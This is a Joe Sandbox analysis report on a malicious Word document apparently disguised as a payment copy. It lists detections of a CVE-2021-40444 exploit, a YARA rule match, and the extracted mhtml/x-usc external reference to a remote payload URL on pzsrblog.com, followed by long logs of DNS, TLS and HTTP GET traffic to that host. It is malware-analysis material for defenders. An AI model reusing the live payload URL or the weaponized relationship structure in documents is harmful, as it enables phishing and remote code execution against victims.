Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment copy_2911022.docx.doc

Overview

General Information

Sample Name:Payment copy_2911022.docx.doc
Analysis ID:770660
MD5:cd3dbd5f1d468da826581361b619b393
SHA1:9d5fc2d99aec7c8c18d8af7267b4a31801fda770
SHA256:1c6189f068ee3870e1d41511bd55c02cef9d98a816a963a26f95ff0b6becea1f
Tags:docdocx
Infos:

Detection

CVE-2021-40444
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Detected CVE-2021-40444 exploit
Contains an external reference to another file
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 1608 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
document.xml.relsEXPL_CVE_2021_40444_Document_Rels_XMLDetects indicators found in weaponized documents that exploit CVE-2021-40444Jeremy Brown / @alteredbytes
  • 0x3f8:$b1: /relationships/oleObject
  • 0x412:$c1: Target="mhtml:http
  • 0x45b:$c2: !x-usc:http
  • 0x49f:$c3: TargetMode="External"

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: Payment copy_2911022.docx.docAvira: detected
Multi AV Scanner detection for submitted file
Source: Payment copy_2911022.docx.docReversingLabs: Detection: 41%
Source: Payment copy_2911022.docx.docVirustotal: Detection: 46%Perma Link

Exploits

barindex
Detected CVE-2021-40444 exploit
Source: document.xml.relsExtracted files from sample: mhtml:https://pzsrblog.com/wp-content/uploads/2012/promzwfp385vxr!x-usc:https://pzsrblog.com/wp-content/uploads/2012/promzwfp385vxr
Source: unknownHTTPS traffic detected: 118.27.125.229:443 -> 192.168.2.22:49176 version: TLS 1.0
Source: unknownHTTPS traffic detected: 118.27.125.229:443 -> 192.168.2.22:49177 version: TLS 1.0
Source: unknownHTTPS traffic detected: 118.27.125.229:443 -> 192.168.2.22:49182 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknownHTTPS traffic detected: 118.27.125.229:443 -> 192.168.2.22:49175 version: TLS 1.2
Source: unknownHTTPS traffic detected: 118.27.125.229:443 -> 192.168.2.22:49179 version: TLS 1.2
Source: unknownHTTPS traffic detected: 118.27.125.229:443 -> 192.168.2.22:49183 version: TLS 1.2
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49175
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49176
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49177
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49179
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49179
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49179
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49179
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49179
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49179
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49179
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49179
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49179
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49179
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49179
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49179
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49181
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49181
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49181
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49181
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49181
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49181
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49181
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49182 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49182
Source: global trafficTCP traffic: 192.168.2.22:49182 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49182 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49182
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49182
Source: global trafficTCP traffic: 192.168.2.22:49182 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49182 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49182
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49182
Source: global trafficTCP traffic: 192.168.2.22:49182 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49182
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49182
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49182
Source: global trafficTCP traffic: 192.168.2.22:49182 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49182 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49182
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49184 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49184
Source: global trafficTCP traffic: 192.168.2.22:49184 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49184 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49184
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49184
Source: global trafficTCP traffic: 192.168.2.22:49184 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49184 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49184
Source: global trafficTCP traffic: 192.168.2.22:49184 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49184
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49184
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49184
Source: global trafficTCP traffic: 192.168.2.22:49184 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49184 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49184 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49184 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49185 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49185
Source: global trafficTCP traffic: 192.168.2.22:49185 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49185 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49185
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49185
Source: global trafficTCP traffic: 192.168.2.22:49185 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49185 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49185
Source: global trafficTCP traffic: 192.168.2.22:49185 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49185
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49185
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49185
Source: global trafficTCP traffic: 192.168.2.22:49185 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49185 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49185 -> 118.27.125.229:443
Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.22:49185
Source: global trafficTCP traffic: 192.168.2.22:49185 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49185 -> 118.27.125.229:443
Source: global trafficDNS query: name: pzsrblog.com
Source: global trafficDNS query: name: pzsrblog.com
Source: global trafficDNS query: name: pzsrblog.com
Source: global trafficDNS query: name: pzsrblog.com
Source: global trafficDNS query: name: pzsrblog.com
Source: global trafficDNS query: name: pzsrblog.com
Source: global trafficDNS query: name: pzsrblog.com
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49185 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49177 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49182 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49182 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49182 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49182 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49182 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49182 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49182 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49182 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49184 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49184 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49184 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49184 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49184 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49184 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49184 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49184 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49184 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49184 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49185 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49185 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49185 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49185 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49185 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49185 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49185 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49185 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49185 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49185 -> 118.27.125.229:443
Source: global trafficTCP traffic: 192.168.2.22:49185 -> 118.27.125.229:443
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2012/PROMZwFp385vXr HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: pzsrblog.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2012/PROMZwFp385vXr HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: pzsrblog.comIf-Modified-Since: Tue, 20 Dec 2022 05:25:57 GMTConnection: Keep-Alive
